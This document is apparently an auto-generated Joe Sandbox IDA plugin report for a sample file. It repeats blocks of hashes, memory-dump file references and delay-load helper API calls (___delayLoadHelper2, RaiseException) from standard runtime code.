                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 745b1b54aee7b5552107bc6472e74f904f49c534d03b6f1013c4876e6265ba7a
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 745b1b54aee7b5552107bc6472e74f904f49c534d03b6f1013c4876e6265ba7a
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 18cb1eef8867841742b7b4a4a84ac757b29cc22b050644538fd383be55707ee5
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 18cb1eef8867841742b7b4a4a84ac757b29cc22b050644538fd383be55707ee5
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
                                                                                                                                    • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                                                                    • Opcode Fuzzy Hash: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
                                                                                                                                    • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: Fjun7
                                                                                                                                    • API String ID: 1269201914-1894352427
                                                                                                                                    • Opcode ID: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
                                                                                                                                    • Instruction ID: bfe368a8bb96d25d90e7fdc83991dcc795105360216e6ecf41d5710a814f4f1c
                                                                                                                                    • Opcode Fuzzy Hash: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
                                                                                                                                    • Instruction Fuzzy Hash: 81A011C22A80003C322A22A02C02C3B022CC0CAF22330E2AEF82888880A88808002832
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: PDu<7
                                                                                                                                    • API String ID: 1269201914-3110419215
                                                                                                                                    • Opcode ID: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
                                                                                                                                    • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                                                                    • Opcode Fuzzy Hash: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
                                                                                                                                    • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: PDu<7
                                                                                                                                    • API String ID: 1269201914-3110419215
                                                                                                                                    • Opcode ID: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
                                                                                                                                    • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                                                                    • Opcode Fuzzy Hash: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
                                                                                                                                    • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: PDu<7
                                                                                                                                    • API String ID: 1269201914-3110419215
                                                                                                                                    • Opcode ID: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
                                                                                                                                    • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                                                                    • Opcode Fuzzy Hash: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
                                                                                                                                    • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: PDu<7
                                                                                                                                    • API String ID: 1269201914-3110419215
                                                                                                                                    • Opcode ID: 31bd0146457bcfd31a0a57d00152b07e708580c7f57fa8e2dadbebc4ac1d62d1
                                                                                                                                    • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
